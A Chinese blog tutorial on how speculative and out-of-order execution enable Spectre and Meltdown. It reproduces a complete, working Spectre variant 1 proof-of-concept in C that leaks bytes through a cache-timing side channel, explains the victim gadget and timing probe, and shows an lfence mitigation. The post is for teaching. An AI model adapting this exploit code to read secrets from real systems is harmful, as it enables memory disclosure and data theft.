Spectre Meltdown attack 攻击原理之 speculative execution

最新推荐文章于 2024-03-03 20:13:10 发布

置顶夏天不热冬天不冷

最新推荐文章于 2024-03-03 20:13:10 发布

阅读量1.8k

点赞数 2

分类专栏：安全文章标签： spectre x86cpu-speculative execution spectre meltdown 漏洞攻击

本文链接：https://blog.csdn.net/chen1540524015/article/details/81813323

版权

安全专栏收录该内容

3 篇文章 1 订阅

订阅专栏

最近比较火的X86 bug——spectre、meltdown 及其变种，攻击的前提是cpu具有speculative execution 的能力，也就是推测执行的能力。当然，现代架构的cpu都具备推测执行的能力。推测执行的时机有多种，比如在执行分支跳转（jmp）、函数调用（call）时，但是核心就是预取数据。当cpu多次执行一段代码时，就会推测执行。比如说一段代码需要循环执行10次，cpu在执行完第10次之后，可能会继续推测执行第11次；当cpu在执行第11次的过程中发现自己推测错了，就不会commit这次的结果。也就是说，推测执行可能产生回滚的动作。

这就要提到一个概念out of order，即乱序执行。举个例子吧。假设从北京到济南只有一条高速公路，而且这条高速公路是4车道。A,B,C,D同时从北京出发去济南，北京的高速有4个入口，A,B,C,D同时上高速，这就是4发射。A,B,C,D在高速上谁前谁后没人在乎，这就是乱序执行。但是到达终点的时候，出口只有一个，A,B,C,D要排队出站。假设规定的顺序是A,B,C,D，只有按这个顺序出站，结果才正确。为什么在出站的时候要按顺序呢？这就涉及到指令之间数据依赖的问题了，本文不做讨论。感兴趣的读者，可以自行去找本计算机体系结构的书来看。乱序执行是导致meltdown的直接原因。

看这个代码块，while(condition){...}，大家都应该知道只有condition为true的时候才会执行循环体的代码。但是从cpu底层来讲，由于乱序执行，判断condition的指令和循环体的一部分指令会同时发射，而在提交的时候判断condition的指令要先出。如果condition为true，本次执行正确，结果就提交了；如果condition为false，结果就不会提交。但是在condition为false的情况下，cpu确实已经执行了循环体的一些代码，这就导致一些数据被加载到cache中。其它代码就可以去猜cache里的数据。如果这些数据是一些敏感数据呢？如果是内核状态下的数据呢？

怎样去猜cache里的数据呢？大家应该知道，cpu在读数据的时候，如果cache里有，就会从cache里拿；如果cache里没有，就从dram里拿。从dram里拿数据花费的时间肯定要比从cache里拿要多。因此判断数据在cache里最好的方法就是判断时间。

下面是一段代码，用来猜自己进程的数据，不涉及权限，即ring3 猜 ring3的数据，这是spectre的一种攻击。如果跨特权级，由ring3去猜ring0的数据，即meltdown攻击，原理还要更复杂一点，以后有时间再写。

在windows下编译时需要设置为debug模式。要猜的数据是：char* secret = "The Magic Words are Squeamish Ossifrage.";

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers*/
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/
/* Bound that victim_function() compares x against; readMemoryByte() flushes
 * it from the cache before every call to the victim. */
unsigned int array1_size = 16;
/* Not referenced by the code in this file.
 * NOTE(review): presumably padding that keeps array1 away from neighbouring
 * data in memory -- confirm before removing or reordering. */
uint8_t unused1[64];
/* The array the victim is allowed to index; only the first 16 entries are
 * given explicit values. */
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
/* Not referenced by the code in this file (see the note on unused1). */
uint8_t unused2[64];
/* Probe array: 256 slots spaced 512 bytes apart, one per possible byte value.
 * The victim loads array2[value * 512]; readMemoryByte() times each slot. */
uint8_t array2[256 * 512];

/* The string that main() tries to recover by default. */
char* secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

/*
 * Victim gadget: a bounds-checked read of array1[x].
 *
 * x is the index into array1. When x passes the check, the byte array1[x]
 * selects which 512-byte-spaced slot of array2 is loaded. The attack in this
 * file relies on the processor running the body speculatively for an
 * out-of-range x, so that the slot left in the cache depends on the byte at
 * array1 + x.
 */
void victim_function(size_t x)
{
	if (x < array1_size)
	{
		/* The loaded value is folded into the global temp so the access is kept. */
		temp &= array2[array1[x] * 512];
	}
}

/********************************************************************
Analysis code
********************************************************************/
/* Cutoff, in timestamp-counter ticks (difference of two __rdtscp readings),
 * at or below which a timed load is counted as a cache hit.
 * NOTE(review): 80 is presumably machine-dependent and may need tuning. */
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/*
 * Guess the byte stored at array1 + malicious_x using a flush-and-time
 * cache probe around victim_function().
 *
 * malicious_x: offset from array1 of the byte to recover (normally out of
 *              bounds for array1).
 * value:       out; value[0] is the best guess, value[1] the runner-up.
 * score:       out; score[0] and score[1] are the hit counts of those guesses.
 *
 * Up to 999 rounds are run. Each round flushes the array2 probe slots, calls
 * the victim 30 times (5 in-bounds training calls per malicious call), then
 * times a load from every probe slot and tallies the fast ones. The loop
 * stops early once the leader is clearly ahead of the runner-up.
 */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
	static int results[256];
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t* addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--)
	{
		/* Flush array2[512*(0..255)] from cache */
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--)
		{
			/* Evict the bound so the victim's comparison has to wait on memory */
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++)
			{
			} /* Delay (can also mfence) */

			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			/* Avoid jumps in case those tip off the branch predictor */
			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF...FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));

			/* Call the victim! */
			victim_function(x);
		}

		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++)
		{
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk); /* READ TIMER */
			junk = *addr; /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
			/* Skip the slot that the in-bounds training calls touched this round */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++; /* cache hit - add +1 to score for this value */
		}

		/* Locate highest & second-highest results tallies in j/k */
		j = k = -1;
		for (i = 0; i < 256; i++)
		{
			if (j < 0 || results[i] >= results[j])
			{
				k = j;
				j = i;
			}
			else if (k < 0 || results[i] >= results[k])
			{
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break; /* Clear success if best is >= 2*runner-up + 5 or 2/0 */
	}

	/*
	 * Copy the tallies out BEFORE mixing junk into results[0]. junk was last
	 * written by __rdtscp (which stores the processor's TSC_AUX value through
	 * its pointer argument) and may be non-zero; XOR-ing it in first would
	 * corrupt the reported score whenever the best guess or runner-up is 0.
	 */
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
	results[0] ^= junk; /* use junk so code above won't get optimized out */
}

/*
 * Entry point of the demo.
 *
 * With no arguments, tries to recover the bytes of `secret` one at a time
 * through readMemoryByte(). With exactly two arguments, argv[1] is parsed as
 * a pointer ("%p") giving the address to start reading from and argv[2] as
 * the number of bytes to read ("%d").
 *
 * Returns 0 on completion, or 1 if the two arguments cannot be parsed.
 */
int main(int argc, const char* * argv)
{
	printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret));
	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
	int score[2], len = (int)strlen(secret);
	uint8_t value[2];

	for (size_t i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3)
	{
		/* Reject unparsable input instead of continuing with a half-updated
		 * offset or a silently ignored length. */
		if (sscanf_s(argv[1], "%p", (void * *)(&malicious_x)) != 1
			|| sscanf_s(argv[2], "%d", &len) != 1)
		{
			fprintf(stderr, "Usage: %s [<address> <length>]\n", argv[0]);
			return (1);
		}
		malicious_x -= (size_t)array1; /* Convert the address into an offset from array1 */
		printf("Trying malicious_x = %p, len = %d\n", (void *)malicious_x, len);
	}

	printf("Reading %d bytes:\n", len);
	while (--len >= 0)
	{
		printf("Reading at malicious_x = %p ... ", (void *)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
		/* Non-printable bytes are shown as '?' */
		printf("0x%02X='%c' score=%d ", value[0],
			(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X='%c' score=%d)", value[1],
				(value[1] > 31 && value[1] < 127 ? value[1] : '?'),
				score[1]);
		printf("\n");
	}
#ifdef _MSC_VER
	printf("Press ENTER to exit\n");
	getchar();	/* Pause Windows console */
#endif
	return (0);
}

运行结果：

代码分析：

做越界访问的代码段为

/* Victim gadget: the bounds check guards array1[x], and the byte read from
 * array1 selects which 512-byte-spaced slot of array2 is loaded. */
void victim_function(size_t x)
{
   if (x < array1_size)
   {
       temp &= array2[array1[x] * 512];
   }
}

猜cache数据的代码：

/* Time reads. Order is lightly mixed up to prevent stride prediction */
       for (i = 0; i < 256; i++)
       {
           mix_i = ((i * 167) + 13) & 255;
           addr = &array2[mix_i * 512];
           time1 = __rdtscp(&junk); /* READ TIMER */
           junk = *addr; /* MEMORY ACCESS TO TIME */
           time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
           /* Skip the slot that the in-bounds training index touched this round */
           if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
               results[mix_i]++; /* cache hit - add +1 to score for this value */
       }

       /* Locate highest & second-highest results tallies in j/k */
       j = k = -1;
       for (i = 0; i < 256; i++)
       {
           if (j < 0 || results[i] >= results[j])
           {
               k = j;
               j = i;
           }
           else if (k < 0 || results[i] >= results[k])
           {
               k = i;
           }
       }
       if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
           break; /* Clear success if best is >= 2*runner-up + 5 or 2/0 */

怎样预防这种攻击呢？只需要在关键的地方不让cpu越过边界检查去推测执行后面的访存就可以了：在边界检查之后加一条串行化的指令lfence（即下面代码中的 _mm_lfence()）。

/* Mitigated variant of the victim gadget: same bounds-checked read, with a
 * load fence placed between the check and the dependent array accesses. */
void victim_function(size_t x)
{
   if (x < array1_size)
   {
       /* Speculation barrier: the loads below are meant not to start until
        * the bounds check above has actually been resolved. */
       _mm_lfence();
       temp &= array2[array1[x] * 512];
   }

}

执行结果：

代码 github : https://github.com/Tinycl/spectre-attack

夏天不热冬天不冷

关注

2
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
Spectre Meltdown attack 攻击原理之 speculative execution

最近比较火的X86 bug， spectre meltdown 以及及其变种，攻击的前提是cpu具有speculative execution 的能力，也就是推测执行的能力。当然现代架构的cpu都具备推测执行的能力了。推测执行的时机有多种，比如在执行分支跳转（jmp）、函数调用（call）时，但是核心就是预取数据。当cpu多次执行一段代码时，就会推测执行，比如说一段代码需要循环执行10次，但是cp...
复制链接

扫一扫

专栏目录